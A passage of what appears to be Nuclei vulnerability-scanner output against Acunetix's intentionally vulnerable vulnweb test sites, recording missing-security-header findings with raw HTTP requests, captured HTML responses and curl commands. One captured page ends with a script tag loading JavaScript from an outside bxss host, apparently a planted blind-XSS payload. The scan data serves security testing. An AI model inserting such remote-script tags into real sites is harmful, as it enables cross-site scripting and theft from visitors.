class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n Vulnerable HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n\\n \\u003cp class=\\\"navbar-text pull-right\\\"\\u003e\\n \\n \\u003ca href=\\\"#myModal\\\" role=\\\"button\\\" class=\\\"btn\\\" data-toggle=\\\"modal\\\"\\u003eLogin\\u003c/a\\u003e\\n \\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eViews\\u003c/li\\u003e\\n \\u003cli id=\\\"popularLi\\\" class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/popular\\\"\\u003ePopular\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/latest\\\"\\u003eLatest\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/carousel\\\"\\u003eCarousel\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/archive\\\"\\u003eArchive\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eWebsite\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/about\\\"\\u003eAbout\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"#/contact\\\"\\u003eContact\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv ng-view\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"pull-left\\\" style=\\\"font-size: xx-small;\\\" id=\\\"refId\\\"\\u003e\\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp class=\\\"pull-left\\\"\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\n\\u003c!-- Modal --\\u003e\\n\\u003cdiv id=\\\"myModal\\\" class=\\\"modal hide fade\\\" tabindex=\\\"-1\\\" role=\\\"dialog\\\" aria-labelledby=\\\"myModalLabel\\\" aria-hidden=\\\"true\\\"\\u003e\\n \\u003cform class=\\\"modal-body\\\" action=\\\"/login\\\" method=\\\"POST\\\" id=\\\"loginForm\\\"\\u003e\\n \\u003cdiv class=\\\"modal-header\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"close\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003e×\\u003c/button\\u003e\\n \\u003ch3 id=\\\"myModalLabel\\\"\\u003eLogin\\u003c/h3\\u003e\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-body\\\"\\u003e\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Username --\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"username\\\"\\u003eUsername\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"text\\\" id=\\\"username\\\" name=\\\"username\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\" value=\\\"admin\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003c!-- Password--\\u003e\\n \\u003clabel class=\\\"control-label\\\" for=\\\"password\\\"\\u003ePassword\\u003c/label\\u003e\\n \\u003cdiv class=\\\"controls\\\"\\u003e\\n \\u003cinput type=\\\"password\\\" id=\\\"password\\\" name=\\\"password\\\" placeholder=\\\"\\\" class=\\\"input-xlarge\\\"\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003cdiv class=\\\"control-group\\\"\\u003e\\n \\u003ca href=\\\"#\\\" class=\\\"btn\\\" id=\\\"loginFormForgot\\\"\\u003eForgot Pwd?\\u003c/a\\u003e\\n \\u003c/div\\u003e\\n\\n \\u003c/div\\u003e\\n \\u003cdiv class=\\\"modal-footer\\\"\\u003e\\n \\u003cbutton class=\\\"btn btn-primary\\\" id=\\\"loginFormSubmit\\\"\\u003eLogin\\u003c/button\\u003e\\n \\u003cbutton class=\\\"btn\\\" data-dismiss=\\\"modal\\\" aria-hidden=\\\"true\\\"\\u003eClose\\u003c/button\\u003e\\n \\u003c/div\\u003e\\n \\u003c/form\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c!-- App libs --\\u003e\\n\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/libs/sessvars.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/post.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/controllers/controllers.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/services/itemsService.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://bxss.s3.amazonaws.com/ad.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:41:20.491030069Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:41:20.918846312Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testaspnet.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testaspnet.vulnweb.com\",\"matched-at\":\"http://testaspnet.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testaspnet.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 14069\\r\\nCache-Control: private\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\\r\\nX-Aspnet-Version: 2.0.50727\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.0 Transitional//EN\\\" \\u003e\\r\\n\\u003cHTML\\u003e\\r\\n\\t\\u003cHEAD\\u003e\\r\\n\\t\\t\\u003ctitle\\u003eacublog news\\u003c/title\\u003e\\r\\n\\t\\t\\u003cMETA http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=windows-1252\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"Microsoft Visual Studio .NET 7.1\\\" name=\\\"GENERATOR\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"C#\\\" name=\\\"CODE_LANGUAGE\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"JavaScript\\\" name=\\\"vs_defaultClientScript\\\"\\u003e\\r\\n\\t\\t\\u003cmeta content=\\\"http://schemas.microsoft.com/intellisense/ie5\\\" name=\\\"vs_targetSchema\\\"\\u003e\\r\\n\\t\\t\\u003cLINK href=\\\"styles.css\\\" type=\\\"text/css\\\" rel=\\\"stylesheet\\\"\\u003e\\r\\n\\t\\u003c/HEAD\\u003e\\r\\n\\t\\u003cbody\\u003e\\r\\n\\t\\t\\u003cform name=\\\"Form1\\\" method=\\\"post\\\" action=\\\"default.aspx\\\" id=\\\"Form1\\\"\\u003e\\r\\n\\u003cdiv\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTTARGET\\\" id=\\\"__EVENTTARGET\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTARGUMENT\\\" id=\\\"__EVENTARGUMENT\\\" value=\\\"\\\" /\\u003e\\r\\n\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATE\\\" id=\\\"__VIEWSTATE\\\" value=\\\"/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\r\\n\\u003cscript type=\\\"text/javascript\\\"\\u003e\\r\\n//\\u003c![CDATA[\\r\\nvar theForm = document.forms['Form1'];\\r\\nif (!theForm) {\\r\\n theForm = document.Form1;\\r\\n}\\r\\nfunction __doPostBack(eventTarget, eventArgument) {\\r\\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\\r\\n theForm.__EVENTTARGET.value = eventTarget;\\r\\n theForm.__EVENTARGUMENT.value = eventArgument;\\r\\n theForm.submit();\\r\\n }\\r\\n}\\r\\n//]]\\u003e\\r\\n\\u003c/script\\u003e\\r\\n\\r\\n\\r\\n\\u003cdiv\\u003e\\r\\n\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__VIEWSTATEGENERATOR\\\" id=\\\"__VIEWSTATEGENERATOR\\\" value=\\\"CA0B0334\\\" /\\u003e\\r\\n\\t\\u003cinput type=\\\"hidden\\\" name=\\\"__EVENTVALIDATION\\\" id=\\\"__EVENTVALIDATION\\\" value=\\\"/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig\\\" /\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\t\\t\\t\\r\\n\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"COLOR: #e6dccf\\\" bgColor=\\\"#806640\\\" height=\\\"75\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cIMG src=\\\"images/logo_acunetix.gif\\\" align=\\\"absMiddle\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\t\\u003cTD style=\\\"FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf\\\" align=\\\"right\\\" bgColor=\\\"#806640\\\"\\r\\n\\t\\t\\theight=\\\"75\\\"\\u003eTest Website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/TD\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\u003cTABLE id=\\\"Table2\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"5\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\u003cTR\\u003e\\r\\n\\t\\t\\u003cTD class=\\\"MenuBar\\\" style=\\\"BORDER-LEFT: #806040 1px solid\\\"\\u003e\\u003cA class=\\\"menu\\\" title=\\\"About\\\" href=\\\"about.aspx\\\"\\u003eabout\\u003c/A\\u003e\\r\\n\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Latest news\\\" href=\\\"default.aspx\\\"\\u003enews\\u003c/A\\u003e \\u003ca href=\\\"login.aspx\\\" id=\\\"Mainmenu2_lnkLog\\\" class=\\\"menu\\\" name=\\\"lnkLog\\\"\\u003elogin\\u003c/a\\u003e \\u003ca href=\\\"Signup.aspx\\\" id=\\\"Mainmenu2_lnkSignup\\\" class=\\\"menu\\\" name=\\\"lnkSignup\\\"\\u003e\\r\\n\\t\\t\\t\\tsignup\\u003c/a\\u003e \\u003cA class=\\\"menu\\\" title=\\\"Network scanner\\\" href=\\\"https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/\\\"\\u003enetwork scanner\\u003c/A\\u003e\\r\\n\\t\\t\\t\\t\\u003cA class=\\\"menu\\\" title=\\\"Network vuln help\\\" href=\\\"https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/\\\"\\u003enetwork vuln help\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\u003ctd class=\\\"MenuBar\\\" align=\\\"right\\\" width=\\\"50px\\\"\\u003e\\r\\n\\t\\t\\t\\u003cA href=\\\"rssFeed.aspx\\\"\\u003e\\u003cIMG src=\\\"images/rss.gif\\\" border=\\\"0\\\"\\u003e\\u003c/A\\u003e\\r\\n\\t\\t\\u003c/td\\u003e\\r\\n\\t\\u003c/TR\\u003e\\r\\n\\u003c/TABLE\\u003e\\r\\n\\r\\n\\t\\t\\t\\u003cTABLE id=\\\"Table1\\\" cellSpacing=\\\"0\\\" cellPadding=\\\"10\\\" width=\\\"790\\\" align=\\\"center\\\" border=\\\"0\\\"\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD id=\\\"tdPageData\\\" valign=\\\"top\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 5/16/2019 12:32:30 PM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=0\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=0\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Vulnerability Scanner Now With Network Security Scans\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003eSeamless OpenVAS integration now also available on Windows and Linux\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:37:35 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=3\\\" class=\\\"NewsOperation\\\"\\u003e(37) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=3\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eAcunetix Web Vulnerability Scanner beta released!\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.\\u003c/DIV\\u003e\\u003cDIV class=\\\"NewsDate\\\"\\u003eposted by \\u003cstrong\\u003eadmin \\u003c/strong\\u003e on 11/8/2005 11:35:22 AM\\u0026nbsp;\\u003ca href=\\\"Comments.aspx?id=2\\\" class=\\\"NewsOperation\\\"\\u003e(41) comments\\u003c/a\\u003e\\u003c/DIV\\u003e\\u003ca href=\\\"ReadNews.aspx?id=2\\u0026NewsAd=ads/def.html\\\" class=\\\"NewsTitle\\\"\\u003eWeb attacks - can your web applications withstand the force?\\u003c/a\\u003e\\u003cDIV class=\\\"NewsShort\\\"\\u003e21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.\\u003c/DIV\\u003e\\u003c/TD\\u003e\\r\\n\\r\\n\\t\\t\\t\\t\\t\\u003cTD vAlign=\\\"top\\\" width=\\\"200\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\t\\u003ctable id=\\\"RightPanel1_Calendar\\\" class=\\\"Calendar\\\" cellspacing=\\\"0\\\" cellpadding=\\\"1\\\" title=\\\"Calendar\\\" border=\\\"0\\\" style=\\\"background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\u003ctr\\u003e\\u003ctd colspan=\\\"7\\\" style=\\\"background-color:#E6B873;\\\"\\u003e\\u003ctable class=\\\"Calendar\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;\\\"\\u003e\\r\\n\\t\\t\\u003ctr\\u003e\\u003ctd style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9040')\\\" style=\\\"color:Black\\\" title=\\\"Go to the previous month\\\"\\u003e\\u0026lt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:70%;\\\"\\u003eNovember 2024\\u003c/td\\u003e\\u003ctd align=\\\"right\\\" style=\\\"width:15%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','V9101')\\\" style=\\\"color:Black\\\" title=\\\"Go to the next month\\\"\\u003e\\u0026gt;\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Sunday\\\" scope=\\\"col\\\"\\u003eSun\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Monday\\\" scope=\\\"col\\\"\\u003eMon\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Tuesday\\\" scope=\\\"col\\\"\\u003eTue\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Wednesday\\\" scope=\\\"col\\\"\\u003eWed\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Thursday\\\" scope=\\\"col\\\"\\u003eThu\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Friday\\\" scope=\\\"col\\\"\\u003eFri\\u003c/th\\u003e\\u003cth align=\\\"center\\\" abbr=\\\"Saturday\\\" scope=\\\"col\\\"\\u003eSat\\u003c/th\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9066')\\\" style=\\\"color:Black\\\" title=\\\"October 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9067')\\\" style=\\\"color:Black\\\" title=\\\"October 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9068')\\\" style=\\\"color:Black\\\" title=\\\"October 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9069')\\\" style=\\\"color:Black\\\" title=\\\"October 